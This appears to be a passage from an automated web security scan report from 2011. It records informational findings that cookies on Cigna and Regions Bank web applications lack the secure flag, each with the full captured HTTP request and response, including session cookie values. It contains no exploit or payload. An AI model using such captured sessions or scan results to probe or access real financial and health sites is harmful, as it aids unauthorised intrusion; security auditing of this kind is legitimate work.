Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: application/x-javascript
date: Mon, 16 May 2011 15:30:36 GMT
last-modified: Wed, 20 Apr 2011 17:47:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/
Content-Length: 168592

function progressbar(limit, met, gwidth) {    
calpercentage = Math.round(met*100/limit);
calwidth=Math.round(gwidth*(calpercentage/100));
remwidth=Math.round(gwidth-calwidth)
output='<div class="out
...[SNIP]...
5.18. https://my.cigna.com/mycignatheme/js/min/jsTop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/js/min/jsTop.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/js/min/jsTop.js HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=68E806DE7FD1107F11DEAFC5F6A8CE37; TLTUID=68E806DE7FD1107F11DEAFC5F6A8CE37; MYCIGNA_OEP_JSESSIONID=0000gya5ooLNN8su43COFm2xuVB:15ngp3vj1; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: application/x-javascript
date: Mon, 16 May 2011 15:30:26 GMT
last-modified: Wed, 20 Apr 2011 17:47:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/
Content-Length: 168592

function progressbar(limit, met, gwidth) {    
calpercentage = Math.round(met*100/limit);
calwidth=Math.round(gwidth*(calpercentage/100));
remwidth=Math.round(gwidth-calwidth)
output='<div class="out
...[SNIP]...
5.19. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/forgotpassword
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 139
content-type: text/plain
date: Mon, 16 May 2011 15:31:15 GMT
last-modified: Fri, 22 Apr 2011 16:46:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE........3.....tRNS....0J...IDATx.b`d..0.......-.....IEND.B`.
5.20. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/forgotid
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 139
content-type: text/plain
date: Mon, 16 May 2011 15:31:05 GMT
last-modified: Fri, 22 Apr 2011 16:46:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE........3.....tRNS....0J...IDATx.b`d..0.......-.....IEND.B`.
5.21. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; TLTHID=76A27AB67FD1107FC7F0A536181C0CE6

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 139
content-type: text/plain
date: Mon, 16 May 2011 15:31:16 GMT
last-modified: Fri, 22 Apr 2011 16:46:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_d992271a-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE........3.....tRNS....0J...IDATx.b`d..0.......-.....IEND.B`.
5.22. https://my.cigna.com/web/public/guest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/guest

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /web/public/guest HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: http://www.mycigna.com/
Cache-Control: max-age=0
Origin: http://www.mycigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:21 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 22481
ibm-web2-location: /web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: private, max-age=60
expires: Mon, 16 May 2011 15:31:21 GMT
Set-Cookie: TLTSID=698A01C87FD1107F1A7A812241DDEA34; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=698A01C87FD1107F1A7A812241DDEA34; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:21 GMT
Set-Cookie: PD_STATEFUL_ccb88d86-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 22491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
5.23. https://my.cigna.com/web/public/guest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/guest

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web/public/guest HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/
Cache-Control: max-age=0
Origin: https://my.cigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:33 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 22481
ibm-web2-location: /web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: private, max-age=60
expires: Mon, 16 May 2011 15:31:33 GMT
Set-Cookie: PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 22491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
5.24. https://secure.regionsmortgage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.regionsmortgage.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: secure.regionsmortgage.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
ntCoent-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:30:26 GMT
Set-Cookie: NSC_tfdvsf.npsuhbhf-wjq=ffffffffaf130e8145525d5f4f58455e445a4a423660;expires=Mon, 16-May-2011 15:47:24 GMT;path=/
Set-Cookie: rfaft2c1=3drGKRGPiL8l+bTjFqkS/7Avg5cA1; Domain=.regionsmortgage.com; Path=/; HttpOnly
Set-Cookie: rfaft2c1_.regionsmortgage.com_%2F_wlf=TlNDX3RmZHZzZi5ucHN1aGJoZi13anFf?xSHrpgIYavehm1DAGTFWnGGtSQcA&; Domain=.regionsmortgage.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
X-Expires-Orig: None
Cache-Control: max-age=3, must-revalidate, private
Cache-Control: private
Set-Cookie: NSC_tfdvsf.sfhjpotnpsuhbhf.dpn=ffffffffaf130d0445525d5f4f58455e445a4a423660;path=/;secure
Content-Length: 1635

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
5.25. https://secureapps.regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: secureapps.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: secureapps.regions.com-ssl=R54983192; WT_FPC=id=2125ecebef9cc3240da1305556579133:lv=1305556579133:ss=1305556579133

Response

HTTP/1.1 403 Forbidden
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:41:40 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...
5.26. https://secureapps.regions.com/OAO/DESGetFiles.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /OAO/DESGetFiles.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OAO/DESGetFiles.aspx?type=styles&version=63438902696&files=13 HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Date: Mon, 16 May 2011 15:19:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Thu, 16 Jun 2011 05:00:00 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 804

.VAMErrorText
{
}

.VAMBlinkText
{
color: White;
}

.VAMFieldWithError
{
}

.VAMValSummary
{
color: red;
}

.VAMValSummary:link {color: red; text-decoration: none;}
.VAMValSum
...[SNIP]...
5.27. https://secureapps.regions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=maulyk45yit1a2rvnyvjro3i; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 404 Not Found
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:46 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
5.28. https://secureapps.regions.com/oao/DES/Appearance/Validation/Validation.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/DES/Appearance/Validation/Validation.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/DES/Appearance/Validation/Validation.css HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45

Response

HTTP/1.1 403 Forbidden
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 1529
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:02 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be displayed</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html;
...[SNIP]...
5.29. https://secureapps.regions.com/oao/ErrorPage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/ErrorPage.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/ErrorPage.aspx HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreensavings
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; ASP.NET_SessionId=wm55et55z1a3uoz33gj0wayn; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:21:02 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 9876


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...
5.30. https://secureapps.regions.com/oao/FormHandler.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/FormHandler.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/FormHandler.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 86459
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:24:56 GMT
Accept-Ranges: bytes
ETag: "04cba3f88ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:56 GMT

...// JScript File
var IE = (document.all) ? 1 : 0; var NN4 = (document.layers) ? 1 : 0; var DOM = (document.getElementById && !document.all) ? 1 : 0; var NS7 = (document.getElementById) ? 1 : 0; var
...[SNIP]...
5.31. https://secureapps.regions.com/oao/Images/confirmation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/confirmation.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/confirmation.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 2319
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:06 GMT

GIF89a........t....nnn............VVV....U.DDD....................X.............`...............D.....w......!.......,............'.di.h..l..p,....B.!w.6.m0.*4.A...9...t:.....Q.4*.^.H .R...:v8~
m..g.
...[SNIP]...
5.32. https://secureapps.regions.com/oao/Images/funding.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/funding.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/funding.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 3849
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:18 GMT

GIF89a.......DDD.....................sssfff.......U.....l".....D.......`...f.......w3.....w..U...............!.......,............'.di.h..l..p,..`#.....|...`..
#..G.9......&.;./($...QB....h.9..E....1
...[SNIP]...
5.33. https://secureapps.regions.com/oao/Images/gettingstarted.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/gettingstarted.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/gettingstarted.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 2300
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:07 GMT

GIF89a................ppp......VVV.......U.DDD........Y.w3...yyy....`...............D....l"...iii......fff...!.......,............'.di.h..l..p,..bC.w...}..M .*.#....9........;./($....F....h........oT.
...[SNIP]...
5.34. https://secureapps.regions.com/oao/Images/helpIcon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
